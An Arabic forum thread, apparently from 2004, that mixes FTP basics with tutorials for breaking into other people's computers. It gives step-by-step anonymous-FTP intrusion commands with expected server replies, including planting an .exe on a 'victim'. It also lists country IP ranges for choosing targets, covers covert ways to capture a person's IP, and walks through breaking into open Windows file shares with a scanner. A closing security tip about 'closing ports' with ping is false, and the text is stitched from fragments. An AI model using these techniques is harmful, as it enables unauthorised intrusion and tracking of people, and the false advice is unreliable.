والفيروسات لا يمكن أن تنتقل عبر ملفات ASCII كما لايمكن أن تنتقل عبر الصور كصيغ jpg & gif & bmp وغيرها من امتدادات الصور ولا عبر ملفات الفيديو والصوت مثل avi - ram - mpg - mp3 - wav وغيرها، وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة ماتكون: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - b64 - bhx، كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات MS Office، لذلك احذر من هذه الملفات وافحصها دائماً قبل تشغيلها. 

طريقة نقل الملفات FTP: 

هناك طرق عديدة لنقل الملفات وهي: 

نقل الملفات باستخدام نظام UNIX 


تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر UNIX: 



ascii: لنقل ملفات ASCII النصية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر. 

binary: لنقل الملفات الثنائية، وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة الأمر. 

status: لفحص الملف ومعرفة هل هو من نوع ASCII أو Binary. 

help: لعرض قائمة بأوامر UNIX. 

dir: عرض محتويات الدليل 

ls: عرض محتويات الدليل الحالي. 

cd directory: تغيير الدليل. 

get filename: جلب الملف المطلوب وانزاله على جهازك. 

mget filename:جلب مجموعة من الملفات. 

pwd: طباعة الدليل الحالي. 

bye: انهاء الارتباط والخروج من النظام البعيد. 



نقل الملفات باستخدام حساب Shell: 

أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة. 

نقل الملفات باستخدام المتصفح Browser: 

نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله. 

نقل الملفات باستخدام حساب SLIP/PPP: 

أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp. 

- استخدام برنامج Ws_ftp LE 5.06: 

ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK. 

_-_Bonz0_-_ 04-18-2004 09:21 PM 

--------------------------------------------------------------------------------


نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet: 

Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة. 

استخدام برنامج Telnet من Windows: 

ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit. 

========= 

الاختراق : 

======= 

FTP 
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور 
21 
مفتوح و هو البور الخاص ب 
FTP 
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها 


Superscanne 


بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي 
إضغط على 
Start 
ثم 
Run 
ثم اكتب 
ftp –n 
سوف تطلع لك نافدة في الدوس مكتوب عليها 
FTP> 
ؤوكي لحد هنا كل شيء تمام 
و بعدين اكتب 
Open 
ثم إضغط على 
إدخال 
Enter 
سوف تتحصل عب النتيجة التالية 
FTP> 
To 
أكتب بجانب 
To 
رقم الإبي للضحية ثم إضغط على إدخال 
و الآن خد بالك معي 

إدا تحصلت على هدا الرد فقد تخطيت خطوة 


Connected to http://www.assassin.com/ 
220 websrv1 Microsoft FTP Service (Version 4.0). 


و الآن أكتب الكتابة التالية 


ftp>quote user ftp 


إدا تحصلت على هدا الرد فقد تخطيت خطوة 


331 Anonymous acces allowed, send identify (e-mail name) as password. 


و الآن أكتب الكتابة التالية 


ftp>quote cwd ~root 


إذا تحصلت على هدا الرد فقد تخطيت خطوة 


530 Please login with USER and PASS 


ثم أكتب الكتابة التالية 


ftp>quote pass ftp 


إدا تحصلت على هدا الرد فقد تخطيت خطوة 
و نجحت في الإقتحام 

230 Anonymous user logged in. 


مبروك أنت الآن في جهاز الضحية 
ما عليك الآن الا ان تقوم بإستعمال 
اوامر الف تي بي 


هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك 


Pwd 


لكي تعر ما يحتويه الهارد ديسك 


Cd 


لإقتحام مجلد مثال 


Cd black 
في هدا المثال قمت بإقتحام مجلد المسمى بلاك 

Ls 
لكي يتضح لك محتوى المجلد أو الهارد ديسك 

Get 
لكي تحمل الى سطح المكتب بتاع جهازك 
مثال 
Get black.exe


Put 
العملية الع**ية ل Get 

يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في 
في جهاز الضحية 
مثال 
Put black.exe 

Clos 
لقطع الإتصال مع الضحية

رقام ايبيهات الدول

الكاتب : لا اعرف



Egypt 62.135.127.255 62.135.0.0 
Bahrain 193.188.127.255 193.188.96.0 
Oman 212.72.31.255 212.72.0.0 
United Arab Emirates 217.165.255.255 217.164.0.0 
United Arab Emirates 195.229.255.255 195.229.0.0 
United Arab Emirates 194.170.255.255 194.170.0.0 
United Arab Emirates 213.42.255.255 213.42.0.0 
Jordan 212.118.31.255 212.118.0.0 
Jordan 217.23.47.255 217.23.32.0 
Jordan 194.165.159.255 194.165.128.0 
Jordan 193.188.95.255 193.188.64.0 
Saudi Arabia 62.3.63.255 62.3.0.0 
Saudi Arabia 212.2.255.255 212.2.224.0 
Saudi Arabia 213.238.31.255 213.238.0.0 
Saudi Arabia 213.184.191.255 213.184.160.0 
Saudi Arabia 212.93.223.255 212.93.192.0 
Saudi Arabia 212.70.63.255 212.70.32.0 
Saudi Arabia 217.8.79.255 217.8.64.0 
Saudi Arabia 213.165.63.255 213.165.32.0 
Saudi Arabia 212.102.31.255 212.102.0.0 
Saudi Arabia 213.230.31.255 213.230.0.0 
Saudi Arabia 212.33.191.255 212.33.160.0 
Saudi Arabia 212.26.127.255 212.26.0.0 
Lebanon 62.84.95.255 62.84.64.0 
Kuwait 62.215.255.255 62.215.0.0 
Kuwait 195.226.255.255 195.226.224.0 
Kuwait 195.39.191.255 195.39.128.0 
Kuwait 62.100.223.255 62.100.192.0 
Kuwait 194.126.63.255 194.126.32.0 
Kuwait 194.54.255.255 194.54.192.0 
Kuwait 213.189.95.255 213.189.64.0 
Kuwait 62.150.255.255 62.150.0.0 
Malaysia 210.186.127.255 210.186.0.0 
Iceland 217.9.143.255 217.9.128.0 
Portugal 213.13.255.255 213.13.0.0 
Pakistan 203.135.63.255 203.135.32.0 
Denmark 62.135.255.255 62.135.128.0 
Ukraine 217.9.15.255 217.9.0.0 
Russian Federation 62.5.255.255 62.5.128.0 
Russian Federation 212.118.63.255 212.118.32.0 
Japan 61.21.255.255 61.21.0.0 
India 61.1.255.255 61.0.0.0 
Poland 213.17.255.255 213.17.128.0 
Poland 217.9.175.255 217.9.160.0 
Poland 217.9.191.255 217.9.176.0 
Lithuania 217.9.255.255 217.9.240.0 
Hungary 213.16.127.255 213.16.64.0 
Turkey 213.14.255.255 213.14.0.0 
Turkey 62.248.127.255 62.248.0.0 
Turkey 195.175.255.255 195.174.0.0 
Sweden 213.15.255.255 213.15.0.0 
Sweden 62.5.127.255 62.5.0.0 
France 213.11.255.255 213.11.0.0 
France 80.15.255.255 80.8.0.0 
France 213.16.31.255 213.16.0.0 
France 213.19.127.255 213.19.0.0 
Bulgaria 213.16.63.255 213.16.32.0 
Switzerland 213.230.63.255 213.230.32.0 
Switzerland 213.3.255.255 213.3.0.0 
Great Britain 213.230.127.255 213.230.64.0 
Great Britain 212.106.63.255 212.106.32.0 
Great Britain 62.3.127.255 62.3.64.0 
Great Britain 213.12.255.255 213.12.0.0 
Great Britain 213.18.255.255 213.18.0.0 
Great Britain 213.230.255.255 213.230.192.0 
Great Britain 213.1.255.255 213.1.0.0 
Great Britain 213.2.255.255 213.2.0.0 
Italy 213.230.159.255 213.230.128.0 
Italy 213.21.191.255 213.21.128.0 
Italy 62.152.159.255 62.152.128.0 
Norway 213.230.191.255 213.230.160.0 
Netherlands 213.10.255.255 213.10.0.0 
Netherlands 213.17.127.255 213.17.0.0 
Netherlands 24.132.255.255 24.132.0.0 
Netherlands 213.19.255.255 213.19.128.0 
Greece 213.5.255.255 213.5.0.0 
Greece 213.16.255.255 213.16.128.0 
Germany 213.7.255.255 213.6.0.0 
Germany 62.84.63.255 62.84.32.0 
Germany 213.20.255.255 213.20.0.0 
Germany 213.21.127.255 213.21.0.0 
Germany 213.9.127.255 213.9.0.0 
Israel 213.8.255.255 213.8.0.0 
Israel 80.230.255.255 80.230.0.0 
Israel 192.118.7.255 192.118.4.0 
Israel 192.118.11.255 192.118.8.0 
Israel 212.179.255.255 212.179.0.0 
Israel 192.118.15.255 192.118.12.0 
Israel 212.116.191.255 212.116.160.0 
Israel 212.199.255.255 212.199.0.0 
Israel 213.189.63.255 213.189.32.0 
Israel 213.8.255.255 213.8.0.0 
Philippines 203.215.95.255 203.215.64.0 
Spain 213.9.255.255 213.9.128.0 
Spain 62.151.255.255 62.151.0.0  
      
للفائده يااخواني 
ولا تسيئون الاستخدام




هنا طريقة معرفة الـ IP للضحية

====== 


الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر 
----------------------------------- 

في البداية أرسل للضحيه اي ملف او صورة او اي شيء 

وبعد ما توصل بنجاح 

تروح تفتح الدوس وطريقه فتحه كالآتي 

تروح لــــ START ثم RUN وتكتب command أو Dosprmpt 

بعد ماتفتح شاشه الدوس السوداء 

تكتب هذا الأمر netstat -n 

مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n 

بعد كتابه الأمر يطلعك الشكل الأتي :- 

Proto -- Local Address -- Foreign Addres -- State 


Local Address هذا رقم الاي بي الخاص بيك انت 
Foreign Address هنا تحصل رقم الاي بي حق الضحية اخر رقم فيهم 
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT 
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت 
بس 

الطريقة الثانيه من خلال الماسنجير 
======================= 
من خلال هذا الرابط
http://www.geocities.com/mondysite/mesn.zip 

طريقة البرنامج 

افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك

بعدين اظغط الزر اللي تحته 

convert IP address 

بعدين اظغط على الزر Listen 

بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر 

وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى 

وبكذا تكون وفرت على نفسك ارسال اي ملفات 

================================================= 


الطريقة الثالثة 
=========== 
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall - 

ZONE ALARM - BLACK ICE 

1-تجيب الIP الخاص بك ثم 

2- تكتب الIP الخاص بك بالشكل هذا 

http:// 212.34.34.78 

3- طبعا الارقام الي فوق افتراضية 

4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه 

الضغط عليه 

5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت 

6- برنامج الف*** وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله 

================================================= 

الطريقة الرابعة عن طريق الإيميل 
====================== 
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر 
confirm.TO 
يعني اذا فرضنا بريد الي تبي ترسل له 

ali************* 

يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل 

ali*************.confirm.TO 

وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به 
وطبعا هو ما راح يعرف 

================================================== 







========= 

الطريقة الخامسة عن طريق الإيميل ايضا 
=========================== 

لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP حقه من رسالته في ((HOTMAIL)) 


من بريد الــHOTMAIL أختر options 

بعدين اختر Mail Display Settings 

بعدين massage headers 

وغير الاختيار الى advanced 

الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة 

وبعض المعلومات الأخرى 
================================================== 







============ 

الطريقة السادسة عن طريق برنامج ICQ 
========================== 
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج 

http://www.geocities.com/mondysite/ICQ_IP.zip 

تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده 

وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي حقه 

هذه اسهل طريقة 

================================================== 







============= 

الطريقة السابعة اظهار رقم ال IP للمواقع 
========================== 

تقوم تفتح شاشه الدوس وتكتب الأمر التالي 


ping -wwww.xxxxxxxxx.com 

ومكان xxxxxxx تحط اسم الموقع 

هاذي الطريقه تطلع IP الموقع  
      

من منكم و صل الى مرحلة الاخترق من دون باتش القليل فقط 

رغم انها سهلة جداً طبعاً هذا درس صغير لتعليمك و هو جزء من اجزاء كثير نبداء 

بسم الله الرحمن الرحيم 

الأختراق بدون باتش و الحماية منه 

هذه الطريقة تسمى طريقه المشاركة في الملفات والطابعة. 

و لكن قبل بدء الاختراق يجب ان يتوافر شرط واحد لبدء الاختراق و هو 

يجب أن يكون على نظامك عميل يسمى . Microsoft Networks 

و طريقة اضافته كالتالى: 

اضغط على زر ابدأ START 

ومن ثم إعدادات . Settings 

ومن ثم لوحة التحكم . Control Panel 

ومن ثم بالنقر على أيقونة شبكات . Networks 

سوف تظهر معك شاشة الاضافه ، اضغط على كلمة عميل . Client 

ستظهر معك شاشة اختيار نوع العميل الذي تريد اضافته ، اضغط على شركة Microsoft

ومن ثم اختر العميل Client for Microsoft Networks 

ومن ثم اضغظ موافق ، بعدها سيطلب منك ادخال قرص الويندوز

لتحميل بعض الملفات وبعدها يطلب منك اعادة التشغيل ، اختر لا لكي لا يعيد النظام التشغيل . 

سترجع الى شاشة اعداد الشبكات مرة اخرى ، اضغط على زر مشاركة بالملفات الطابعة . 

ضع صح على كل من : 

اريد أن اكون قادرا على إعطاء الاخرين حق الوصول الى ملفاتي.

I want to be able to give others access my files 

اريد أن اكون قادرا على السماح للآخرين بالطباعة على طابعتي . 

I want to be able to allow to others to print on my printers 

· اضغط علىموافق ، وبهدها أغلق اعدادات الشبكة . 

· سترجع الى شاشة لوحة التحكم ، اضغط على ايقونة كلمات المرور ( احمر Passwords ) 

· ستظهر معك شاشة كلمات السر ، قم انقر على ايقونه Remote Administration . 

· ضع علامه صح على Enable remote administration of this server 


وبعدها ادخل أي كلمة سرية مرتين ومن ثم موافق 

. الغرض من هذه الخطوة كي لا يتمكن أحد من الوصول الى ملفاتك وطابعتك الا بالكلمة السرية التي أنت وضعتها 

الان حققت الشرط الازم للاختراق وبقي عليك الطريقة لكي تصل الى ملفات غيرك على الانترنت . 

==> الاختراق <== 

اولا يجب عليك تحميل البرنامج المستخدم و هو Legion 

(ملاحظة : البرنامج ليس لدى الان ولكن تستطيع البحث عنه في جوجول ) 

بعد تشغيلك للبرنامج سوف يظهر لك قائمتين . القائمة اليسرى يظهر لك أرقام الايبي

المصطاده والقائمة اليمنى يعرض لك فيها بيانات كل ايبي وماهي السواقات والطابعات

المشاركة وفي الاعلى هناك 4 مربعات فارغة لك تطلب منك ادخال المدى 

الذي تريد البحث فيه ، على سبيل المثال نريد البحث في المدى 212.64.130.1 

. بعد ان تملى المربعات اضغط على زر scan لكي تبدأ البحث 

سوف يبدأ البرنامج في البحث وسوف يظهر لك ارقام الايبي التي حصل عليها في

القائمة اليسرى ، وبعد ان ينتهي من البحث سوف يقوم بفحص كل ايبي حصل

عليه لكي يظهر لك ما بداخل كل ايبي من سواقات وطابعات ومشاركة ، وسوف يضعها لك في القائمة اليمنى . 

فلنفرض أنه اصطاد سواقات على احدى ارقام الايبي عندها سيعرض لك البيانات كالمثال التالي : 

Shared resources at //212.64.130.55 

Sharename Type Comment 

ــــــــــــــــــــــــــــــــــــــــــــــــــ 
ــــــــ 

ATL OPS STUF Disk 

C Disk 

DC ROM Disk 

DC STUFF DISK 

FMPRO Disk 

JW STUFF Disk 

The command was completed successfully . 


اذا ظهرت لك بيانات على أي رقم كالبيانات السابقة انسخ رقم الايبي . 

بعدها اضغط على زر ابدأ . (START) 

اختر تشغيل . (RUN) 

ثم اكتب رقم الايبي 

ــــــــــــــــــــــــــــــــــــــــــــــــــ 
ـــــــــــ 

عندها سوف يفتح لك نافذه كنافذه المستكشف (Explorer)

ويضع فيها سواقات الجهاز الذي أنت بداخلة الآن ، اختر أي سواقة تريد . 

==> كيف تحمي نفسك من الاختراق <== 

اذا كنت مبتدء وتريد حمايه جهازك وملفاتك على الانترنت من هذه الطريقه فامسح العميل 

Microsoft Network من اعدادات الشبكة ، وسوف يكون جهازك بامان تام ان شاء الله  
      
امنع اى شخص من الدخول الى جهازك عبر الدوس 


بسم الله الرحمن الرحيم 

هتقفل جميع البورتات ال على الجهاز بتاعك 

اولاا قم بفتح الدوس 

اولاا ستار
تانى حاجه رن 
تالت شى command

قم بالاتى 

اول شى قم بكتابت الاتى 

ping host

تانى شى 

ping port80
تالت شى 
ping port139
رابع شى 
ping port23
خامس شى 
ping host
ولحظ كدا مفيش اى شى يقدر 
يخش من الدوس  
      
]]></description>
			<content:encoded><![CDATA[<div><div align="center">لسلام عليكم و رحمة الله و بركاته<br />
<br />
اقدم لكم شرح ممل جدا لاختراق الدوس على عدة دروس و المعروف و الاسم الادق<br />
<br />
(اختراق الftp اختصار file transfeer protocol)............ <br />
<br />
<br />
مقدمة <br />
<br />
ظهرت خدمة بروتوكول نقل الملفات (FTP) في المراحل المبكرة من مسيرة الإنترنت، ولذلك فقد مرت بمراحل عديدة من التطوير للارتقاء بأدائها، ويعتقد الخبراء أن تطورها سيواكب تطور الإنترنت ويسير معها جنبا إلى جنب، مما سيعزز دورها في مستقبل التكنولوجيا في العالم السيبيري (cyber technology). <br />
<br />
<br />
ملاحظة: <br />
<br />
قد لا تؤدي عبارة خدمة بروتوكول نقل الملفات المعنى المطلوب منها، الذي ينص على أنها خدمة الإنترنت المستندة إلى بروتوكول نقل الملفات (Internet service based on File Transfer protocol)، وسعيا للاختصار نستخدم عبارة بروتوكول نقل الملفات أو خدمة نقل الملفات لتدل على المعنى نفسه. <br />
<br />
ماهو نقل الملفات FTP? <br />
<br />
FTP هي اختصار لكلمة File Transfer Protocol وتعني بروتوكول نقل الملفات، وهذه الخدمة هي احدى تسهيلات TCP/IP التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات FTP الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم تشغيل مختلفة وعليه فلديها أشكال Formats مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم به FTP, وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفاً في أميركا الى جهازنا. <br />
<br />
ما هي خدمة بروتوكول نقل الملفات <br />
<br />
يُعد المصطلح FTP اختصاراً لبروتوكول نقل الملفات (File Transfer Protocol)، وهو طريقة سريعة لنقل الملفات (الكبيرة عادةً) بين أجهزة الكمبيوتر البعيدة عن بعضها والموجودة في شبكة تستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. <br />
<br />
ويتشابه بروتوكول نقل الملفات (FTP) مع بروتوكول نقل النص المترابط (HTTP) في كون كلا البروتوكولين ينقل الملفات من الأجهزة الخادمة البعيدة (remote servers)، ولكنهما يختلفان في أن بروتوكول نقل النص المترابط (HTTP) يستخدم المستعرض (Web browser) لعرض الملفات المنقولة على شاشة المستخدم، وتكون تلك الملفات ذات محتوى متعدد الوسائط (Multimedia) –هذا المحتوى الذي يُميز صفحات الويب- ، بينما يُخزِن بروتوكول نقل الملفات (FTP) الملفات المنقولة على القرص الصلب لجهاز المستخدم. <br />
<br />
وتبرز أهمية هذه الخدمة عند نقل الملفات الكبيرة التي يعجز البريد الإلكتروني عن نقلها. إذ يمكن لبروتوكول نقل الملفات أن يتعامل مع أي نوع من الملفات سواء أكان معقداً مثل ملفات لغة النص المترابط (HTML) المضغوطة (compressed) وملفات الرسوم (graphic files)، أم بسيطاً مثل الملفات النصية (text files). ويمكن أن تُنقَل هذه الملفات من أجهزة خادمة بعيدة وتُخزَّن على القرص الصلب لجهاز المستخدم عن طريق عملية التنزيل (downloading)، كما تظهر فائدة استخدام خدمة بروتوكول نقل الملفات عند تصميم موقع شخصي على الويب، والحاجة إلى نقل ملفات الموقع إلى الأجهزة الخادمة (servers) عن طريق عملية التحميل (uploading). ويختلف بروتوكول نقل الملفات (FTP) عن البروتوكولات الأخرى التي لا تعتمد على الإنترنت في نقل الملفات مثل: Kermit، وXMODEM، إضافة إلى ZMODEM. <br />
<br />
<br />
FTP الخادم و FTP المستفيد <br />
<br />
<br />
تعتمد خدمة (FTP) على مبدأ الخادم/المستفيد (client/server)، ويكون فيه خادم FTP عبارة عن خادم ملفات يعتمد بروتوكول (FTP) في تحميل وتنزيل الملفات على أدلته (directories) شرط وجود الصلاحية المحددة باسم تعريف خاص (ID) وكلمة مرور (password) . <br />
<br />
ومن الجدير بالذكر أن الملفات الموجودة في خادم (FTP) تكون مضغوطة، وبالتالي يكون استرجاعها أكثر سرعة وسهولة، وتتعدد صيغ الملفات المضغوطة المستعملة؛ إذ نجد: .arc ، و .cpt ، و .zip، و .Z، بينما تكون صِيغ ملفات الرسوم من مثل: &quot;.gif، و .jpg&quot;، أما الملفات المخزنة بصيغة ثنائية (binary files) فتكون صيغها من مثل: &quot;.hqx، و .uu&quot;. وإلى جانب الملفات السابقة تحتوي الأجهزة الخادمة لبروتوكول ملفات “read me” التي تبتدئ أسماؤها عادة بالرمز &quot;00&quot;، وبالتالي تظهر هذه الملفات في بداية القائمة. وتنبع أهمية التمييز بين أنواع الملفات من أن خدمة بروتوكول نقل الملفات تستخدم تعليمات مختلفة تتمتع بمواصفات نقل متمايزة لكل نوع من تلك الأنواع. <br />
<br />
ومن جهة أخرى، فإنه يلزم لنقل الملفات باستخدام بروتوكول (FTP) وجود برنامج يدعى برنامج مستفيد FTP (FTP client)، وهو برنامج يُمَكِّن المستخدم من تنزيل وتحميل الملفات من وإلى موقع FTP ما عبر شبكة تَستخدم بروتوكول (TCP/IP) مثل شبكة الإنترنت. وتوجد الكثير من التطبيقات التي تقوم بوظيفة مستفيد FTP وتُناسب مُختلف أنواع الأجهزة، ويمكن تنزيل الكثير منها مجاناً عن طريق الإنترنت. <br />
<br />
<br />
<br />
المستخدم (anonymous FTP) <br />
<br />
<br />
تسمح هذه الميزة للمستخدمين بالولوج إلى مواقع (FTP) دون الحاجة إلى التعريف بأنفسهم، إذ يمكنهم استخدام كلمة “anonymous” أو كلمة “ftp” على أنها اسم المستخدم (user-ID)، ويُوضع البريد الإلكتروني للمستخدم مكان كلمة مرور (password). ويغلب استخدام هذه الميزة في عمليات تنزيل الملفات من المواقع العامة التي توفرها بعض الجامعات والشركات الحكومية والخاصة على الإنترنت. ولكن مشكلة هذه المواقع تكمن في صعوبة الاتصال بها بسبب الضغط الكثيف عليها. <br />
<br />
لماذا خدمة بروتوكول نقل الملفات (FTP) بدلاً من البريد الإلكتروني ومستعرضات الويب؟ <br />
<br />
تتميز خدمة (FTP) عن البريد الإلكتروني (Email) بأمور عديدة فهي أكثر فعالية في نقل الملفات الكبيرة، كما أنها أسرع من البريد الإلكتروني، مما يكفل تنفيذ المهمة نفسها في زمن أقل من زمن نقلها عن طريق البريد الإلكتروني، وهذا يجعل خدمة بروتوكول نقل الملفات أوفر. <br />
<br />
أما ما يُميز خدمة بروتوكول نقل الملفات (FTP) عن مستعرضات الويب (Web browsers) فهو: <br />
<br />
• تستطيع خدمة (FTP) القيام بعملية تحميل الملفات (uploading)، إذ تنقل المعلومات وخاصة وثائق (HTML) إلى الخادم البعيد الذي تُخزن عليه صفحات الويب. <br />
<br />
<br />
• تَستخدِم خدمة (FTP) أوامرَ (commands) لإجراء عمليات التحديث (حذف، أو إعادة تسمية أو نقل أو نسخ) على الملفات الموجودة على الخادم. <br />
<br />
<br />
• تدعم خدمة (FTP) السرية (privacy)، إذ يكون للمستخدمين المرخصين كلمات مرور (passwords) تسمح لهم بالولوج إلى الخادمات البعيدة.<br />
<br />
<br />
_-_Bonz0_-_ 04-18-2004 09:21 PM <br />
<br />
--------------------------------------------------------------------------------<br />
<br />
علاقة (FTP) مع البريد الإلكتروني: <br />
<br />
بدأت تُستخدم مؤخراً طريقة أخرى لاسترجاع الملفات عن طريق خادم بريدي خاص لخدمة (FTP)، لا تحتاج فيها إلى برنامج مستفيد FTP (FTP client)، ولكن يكفي أن يكون لك حساب بخدمة البريد الإلكتروني (Email account)، إذ يقوم خادم بريد بروتوكول نقل الملفات بالعمليات التي تقوم بها خدمة نقل الملفات، ثمَّ تُرسَل النتيجة عن طريق البريد الإلكتروني إلى المستخدم، ولا تخفى فوائد هذا التوظيف لخدمة بروتوكول نقل الملفات في البريد الإلكتروني لما تقدمه من سرعة وضمان في نقل الملفات الكبيرة، لم يكن بمقدور مستخدم البريد العادي الحصول عليها، وإليك فيما يلي أمثلة عن بعض الأجهزة الخادمة لبريد بروتوكول نقل الملفات (FTP): <br />
<br />
<br />
<br />
<a href="mailto:ftpmail@ppa.dec.com">ftpmail@ppa.dec.com</a> <br />
<a href="mailto:ftpmail@decwrl.dec.com">ftpmail@decwrl.dec.com</a> <br />
<a href="mailto:ftpmail@src.doc.ic.ac.uk">ftpmail@src.doc.ic.ac.uk</a> <br />
<br />
<br />
<br />
لولوج إلى (FTP) عن طريق مستعرضات الويب <br />
<br />
تُستخدَم مستعرضات الويب للولوج إلى ملفات موجودة في مواقع FTP، ويتم ذلك بسهولة عبر النقر على الروابط links. فللاتصال بموقع FTP تستبدل الحروف http في حقل العنوان (URL) بالحروف التالية ftp، ويكتب بعدها اسم الموقع (site name). ويمكن أن يُستخدم كل من:Netscape Navigator, Internet Explorer في الولوج إلى مواقع FTP، مع وجود الكثير من القيود التي لا يمكن حلها إلا بالحصول على التراخيص المناسبة. <br />
<br />
<br />
برامج مستفيد FTP <br />
<br />
<br />
يوجد العديد من برامج مستفيد FTP التي تعمل على أجهزة أي بي إم (IBM) أو الأجهزة المتوافقة معها، وتلائم العديد من أنظمة التشغيل (مثل: دوس (DOS)، وويندوز (Windows). كما إن نظم التشغيل الأحدث مثل ويندوز (Windows 95) 95 وويندوز (Windows 98) 98 وويندوز(Windows NT) NT تدعم خدمة بروتوكول نقل الملفات عبر برنامج خدمي (Utility program) هو ftp يظهر على شكل واجهة أوامر سطرية (command-line interface)؛ تشبه برنامج مستفيد FTP المُستخدم في نظام يوني** (Unix)، كما تستخدم أجهزة أخرى تعمل على نظام يوني** (Unix) برنامجَ مستفيد FTP آخر يدعى (NcFTP). <br />
<br />
كما توجد العديد من البرامج التي تعمل في بيئة رسومية تدعم خاصة السحب والإفلات (drag and drop)، ونذكر مثالين على هذه البرامج: <br />
<br />
<br />
<br />
• البرنامج WS FTP: للعمل على منصة التشغيل ويندوز (Windows). <br />
<br />
<br />
• البرنامج FETCH: للعمل على منصة التشغيل ماكنتوش (Macintosh). <br />
<br />
<br />
أقسام نقل الملفات: <br />
<br />
نقل الملفات ينقسم الى قسمين: <br />
<br />
=================== <br />
<br />
تنزيل الملفات Download: <br />
<br />
وهو جلب الملفات من الكمبيوتر المضيف Host الى الجهاز المحلي Local. <br />
<br />
ارسال الملفات Uplaod: <br />
<br />
